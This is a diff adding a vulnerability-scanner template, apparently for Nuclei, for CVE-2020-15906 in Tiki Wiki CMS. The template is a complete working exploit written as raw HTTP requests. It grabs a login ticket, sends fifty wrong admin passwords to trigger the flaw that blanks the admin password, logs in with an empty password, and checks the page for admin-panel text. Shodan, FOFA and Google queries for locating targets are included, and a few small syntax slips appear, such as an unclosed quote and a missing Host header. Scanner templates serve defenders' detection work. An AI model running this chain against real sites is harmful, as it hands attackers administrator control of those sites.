Added CVE-2020-15906 Template

http/cves/2020/CVE-2020-15906.yaml

@@ -0,0 +1,150 @@
+id: CVE-2020-15906
+
+info:
+  name: Tiki Wiki CMS GroupWare Auth Bypass
+  author: JeonSungHyun[nukunga], gy741, nechyo, nechyo, harksu 
+  severity: critical
+  description: tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15906
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-15906
+    - https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-15906
+    cwe-id: CWE-307
+    cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    vendor: Tiki Wiki CMS
+    product: Tiki Wiki CMS
+    shodan-query:
+      - title:"Tiki Wiki CMS"
+      - http.title:"Tiki Wiki CMS"
+    fofa-query: title="Tiki Wiki CMS"
+    google-query: intitle:"Tiki Wiki CMS
+
+http:
+  - raw:
+      - |
+        GET /tiki-login_scr.php HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        part: body
+        name: ticket1
+        internal: true
+        group: 1
+        regex:
+          - 'class="ticket" name="ticket" value="(.*)"'
+
+  - raw:
+      - |
+        POST /tiki-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: {{RootURL}}/tiki-login_scr.php
+
+        ticket=§ticket1§&user=admin&pass=§attempt§&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n
+      
+    payloads:
+      attempt:
+        - nkQ0yYzgF5Er
+        - P5UdGflH48W3
+        - xFq7vKNLmhZp
+        - 8zKtGnh4dW5R
+        - CfXp2VbQz8Er
+        - Lh3K6vPzM9Xn
+        - bG4RxHpY2MdQ
+        - 7zNtKh3WqF5L
+        - Y8rQ2GpLx9Kn
+        - C7KzLmP5X9Vh
+        - v3LdX8GmQ5Kn
+        - W4NzX6PqL3Ft
+        - Q5GhY2VrX7Jk
+        - r9KdL4PhY6Gm
+        - 8XjVq5LhZ2Kr
+        - L5WnQ9KzY8Pr
+        - M2XdL5GrY9Kh
+        - N6YzP8WkL5Xt
+        - G7JqX5VbM2Kp
+        - H4PrX8LkY6Gm
+        - J5LhY2VqX9Kr
+        - 8GrX5NqL2KhY
+        - K4WnY9PzM8Xt
+        - Q2XkL5PrY8Vh
+        - 9JhL4VqX5GrM
+        - N2XdY5PqL9Kh
+        - W4LhY8KzM5Xt
+        - G5JqX2VrY9Kp
+        - H9PrL5XkY2Gm
+        - L8WnX5KzY9Pr
+        - M4XkY2LqV5Gt
+        - N5XdL9PqY8Kr
+        - P8XnL5VrY2Kh
+        - Q4JqX9LhY5Gr
+        - V7LkX5PrY2Gt
+        - L2WnY9KzX8Pr
+        - M9XdL5PqY4Kh
+        - N8LhY2VqX5Gr
+        - Q7XkL5PrY9Gm
+        - X4LhY8WnM5Kp
+        - G2JqL5VrY9Kt
+        - H7PrX8KzY2Gm
+        - J4LhY5VqX9Kr
+        - N9XkY2LqP5Gt
+        - W8LhY5PrX2Kz
+        - G4JqL5XkY9Vr
+        - P5WnY2KzL8Gt
+        - M7XkY9LhP2Gr
+        - Q2JqL5VrY8Kh
+        - 2JqL5VrY8Kh
+    attack: batteringram
+    threads: 50
+
+  - raw:
+      - |
+        GET /tiki-login_scr.php HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /tiki-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: {{RootURL}}/tiki-login.php
+
+        ticket=§ticket2§&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n
+
+    extractors:
+      - type: regex
+        part: body_1
+        name: ticket2
+        internal: true
+        group: 1
+        regex:
+          - 'class="ticket" name="ticket" value="(.*)"'
+
+  - raw:
+      - |
+        GET /tiki-index.php HTTP/1.1
+
+    cookie-reuse: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        words:
+          - "System Menu"
+          - "Home"
+          - "Search"
+          - "Wiki"
+          - "File Galleries"         
+          - "Settings"    
+        condition: and
+        part: body
+
+      - type: word
+        words : 
+          - "Show on admin log-in"
+          - "Tiki Setup"